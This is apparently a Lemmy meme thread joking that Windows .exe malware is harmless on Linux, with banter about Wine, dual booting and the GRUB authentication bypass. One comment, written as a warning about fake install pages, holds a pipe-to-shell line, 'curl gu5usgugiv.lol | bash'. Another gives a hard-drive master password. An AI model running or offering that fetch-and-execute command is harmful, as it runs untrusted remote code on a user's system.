1016
Exe in a bottle (lemmy.sdf.org)
top 50 comments
sorted by: hot top controversial new old
[-] trhbd@scribe.disroot.org 1 points 1 day ago

until you try to install .exe game file using lutris and wine

[-] diemartin@sh.itjust.works 118 points 4 days ago
[-] Jumpingspiderman@lemmy.world 17 points 3 days ago

Why does your admin account look like a scrotum?

[-] sibannac@lemmy.world 7 points 3 days ago

it's where the power is stored

[-] Zink@programming.dev 3 points 3 days ago

Insert joke about it taking balls to use it

Insert another joke about it being the root of the access tree/graph in the image

[-] diemartin@sh.itjust.works 7 points 3 days ago

Maybe because scratching an itch there is generally seen as a bad move if you don't know what you're doing.

[-] kamen@lemmy.world 123 points 4 days ago* (last edited 4 days ago)

... and yet some of the same people will readily copy-paste random shell scripts into their terminal without fully understanding them.

[-] f4f4f4f4f4f4f4f4@sopuli.xyz 1 points 1 day ago* (last edited 1 day ago)

Even if you understand the commands, you need to trust the website because a malicious site can use JavaScript to copy something completely different into your clipboard, with a newline character at the end to automatically execute when pasted. (Is the newline exploit fixed in all shells? It used to fail in zsh but work in many others...)

One can also paste into a text editor to verify before pasting into terminal, but what noob is going to know or bother to?

[-] Huschke@lemmy.world 88 points 4 days ago

But a forum post said it would fix my issue.

[-] Mutelogic@sh.itjust.works 34 points 4 days ago

I feel like there's some truth to this!

If the posted answer was in a moderately active thread, you can generally assume it's correct if there are no contradictory replies.

[-] lemming741@lemmy.world 28 points 4 days ago

If the thread has been dead a few weeks, they could edit their post. Or if it pulls a objects, those objects could change.

[-] possiblylinux127@lemmy.zip 30 points 4 days ago* (last edited 4 days ago)
curl gu5usgugiv.lol | bash || curl get.k3s.io | bash

Someone did something similar to this with a fake brew package manager page. They paid Google to put it on the front page.

[-] DragonsInARoom@lemmy.world 11 points 4 days ago

Let me open up my Linux bible and see if its malicious

load more comments (3 replies)
[-] cappa@feddit.org 161 points 4 days ago

This is were WINE comes handy /s

[-] SapphironZA@sh.itjust.works 9 points 3 days ago

Virus running in wine: "WTF is this place. It's familiar, but it's all wrong!"

[-] Lime66@lemmy.world 77 points 4 days ago

Wine automatically running:

[-] mvirts@lemmy.world 21 points 3 days ago

And then it starts running because you set up wine with binfmt_misc, only to crash a few seconds later

[-] apex32@lemmy.world 52 points 4 days ago

A friend of mine once downloaded something malicious to his Linux machine and wasn't worried about it. Then some time later, while browsing his files from a Windows machine, saw it and was like, "hey, what's this?" Oops.

He's a tech savvy guy, so I'm guessing the fact he had downloaded it himself really let his guard down.

[-] betterdeadthanreddit@lemmy.world 55 points 4 days ago

That's why you don't store your stool samples in the same fridge as your chocolate pudding. Malware goes into the vault.

[-] cmgvd3lw@discuss.tchncs.de 26 points 4 days ago

That's another reason not to dual boot. Ditch Windows.

[-] Zacryon@feddit.org 18 points 3 days ago

Remember that time, when it was possible for about 6 years to hack into any Linux system (without drive encryption) which had GRUB by pressing backspace exactly 28 times? Yeah, good old times.

https://www.hmarco.org/bugs/CVE-2015-8370-Grub2-authentication-bypass.html

[-] kattfisk@lemmy.dbzer0.com 9 points 3 days ago

That's hyperbole. Such a system can be "hacked" by simply plugging in a usb-stick and booting from that instead, or dozens of other ways.

The only reason to use GRUB authentication I can think of would be in something like a kiosk.

[-] FiskFisk33@startrek.website 15 points 3 days ago

If the adversary has physical access you are generally pwned either way

[-] Varcour@lemm.ee 5 points 3 days ago

Does anyone here use GRUB authentication? If so why? What's your threat model?

[-] SynopsisTantilize@lemm.ee 4 points 3 days ago

Breh. What? I feel naked right now.

[-] f4f4f4f4f4f4f4f4@sopuli.xyz 1 points 1 day ago* (last edited 1 day ago)

Better replace your keyboard everytime you leave it unattended, someone could put a keylogger in it. Don't forget to check for hidden pinhole cameras around that capture you inputting your passwords. Etc, etc. Those even work against an encrypted drive...

[-] SynopsisTantilize@lemm.ee 1 points 1 day ago

To be fair I rotate hardware and DE so often my drives are wiped nearly monthly. But Jesus this is egregious.

[-] f4f4f4f4f4f4f4f4@sopuli.xyz 2 points 17 hours ago* (last edited 17 hours ago)

grub's always been a hack. The first stage in 512 byte boot sector chainloads the second stage in the space between boot sector and the first sectors of first partition. Second stage chainloads the kernel. (This is my primitive gist.)

grub was never made for security, it just exists in a place where one would think security would be priority... but again, physical access = pwned, etc.

Not quite the same, but funny: I recently unlocked an HDD from a car head unit to prove to a friend that it was only storing music ripped from its CD drive (and the associated minimal CD title database)... Toshiba master HDD password is 32 spaces. 😅

[-] SynopsisTantilize@lemm.ee 1 points 8 hours ago

Oh shit hahaha that's straight up disrespectful. Well yea I guess that makes sense but I just never thought to deep about it.

[-] lath@lemmy.world 48 points 4 days ago

Modern viruses check the os before deciding which type of file to send your way.

[-] LordKitsuna@lemmy.world 56 points 4 days ago

This is why you use a user agent switcher to lie about being windows. It's a form of anti malware!

load more comments (20 replies)
[-] dev_null@lemmy.ml 13 points 4 days ago* (last edited 4 days ago)

Do you have any data to back up that claim? I don't think that's true at all, it would be very rare.

[-] lath@lemmy.world 7 points 4 days ago* (last edited 4 days ago)

Do you have any data to back up that claim?

None whatsoever.

I don’t think that’s true at all, it would be very rare.

Suspicious words. You have one, don't you? Don't worry, I won't tell.

load more comments (6 replies)
[-] omgitsaheadcrab@sh.itjust.works 9 points 4 days ago

Pick the least POSIX shell, or roll your own!

[-] madame_gaymes@programming.dev 13 points 4 days ago

Rename all the coreutils. Confuse yourself and the hackers!

load more comments (1 replies)
[-] daggermoon@lemmy.world 37 points 4 days ago

It does if you right click it and run with wine or whatever it says

[-] kusivittula@sopuli.xyz 10 points 4 days ago

in mint cinnamon it still has no power, wine is not in the context menu or program list!

[-] iSeth@lemmy.ml 7 points 4 days ago

...by default. You could always add it.

load more comments (2 replies)
[-] arc@lemm.ee 3 points 3 days ago

Sometimes when I've torrenting from a public wifi I'll get a malicious .scr file - but since I torrent from an Android phone it can't do anything to me.

[-] 9point6@lemmy.world 13 points 4 days ago

This has given me a horrendous idea involving a Windows batch file and a weird shebang

[-] lurch@sh.itjust.works 8 points 4 days ago

you're not the first. there absolutely are multiplatform launcher scripts. i have used one for installers a few years ago.

load more comments (1 replies)
[-] Emerald@lemmy.world 5 points 3 days ago

Well if the exe was in a bottle it would be dangerous.

https://usebottles.com/ :D

load more comments
view more: next ›
this post was submitted on 28 Feb 2025
1016 points (100.0% liked)

linuxmemes

22935 readers
970 users here now

Hint: :q!


Sister communities:


Community rules (click to expand)

1. Follow the site-wide rules

2. Be civil
  • Understand the difference between a joke and an insult.
  • Do not harrass or attack users for any reason. This includes using blanket terms, like "every user of thing".
  • Don't get baited into back-and-forth insults. We are not animals.
  • Leave remarks of "peasantry" to the PCMR community. If you dislike an OS/service/application, attack the thing you dislike, not the individuals who use it. Some people may not have a choice.
  • Bigotry will not be tolerated.
  • These rules are somewhat loosened when the subject is a public figure. Still, do not attack their person or incite harrassment.
  • 3. Post Linux-related content
  • Including Unix and BSD.
  • Non-Linux content is acceptable as long as it makes a reference to Linux. For example, the poorly made mockery of sudo in Windows.
  • No porn. Even if you watch it on a Linux machine.
  • 4. No recent reposts
  • Everybody uses Arch btw, can't quit Vim, <loves/tolerates/hates> systemd, and wants to interject for a moment. You can stop now.
  • 5. 🇬🇧 Language/язык/Sprache
  • This is primarily an English-speaking community. 🇬🇧🇦🇺🇺🇸
  • Comments written in other languages are allowed.
  • The substance of a post should be comprehensible for people who only speak English.
  • Titles and post bodies written in other languages will be allowed, but only as long as the above rule is observed.
  •  

    Please report posts and comments that break these rules!


    Important: never execute code or follow advice that you don't understand or can't verify, especially here. The word of the day is credibility. This is a meme community -- even the most helpful comments might just be shitposts that can damage your system. Be aware, be smart, don't remove France.

    founded 2 years ago
    MODERATORS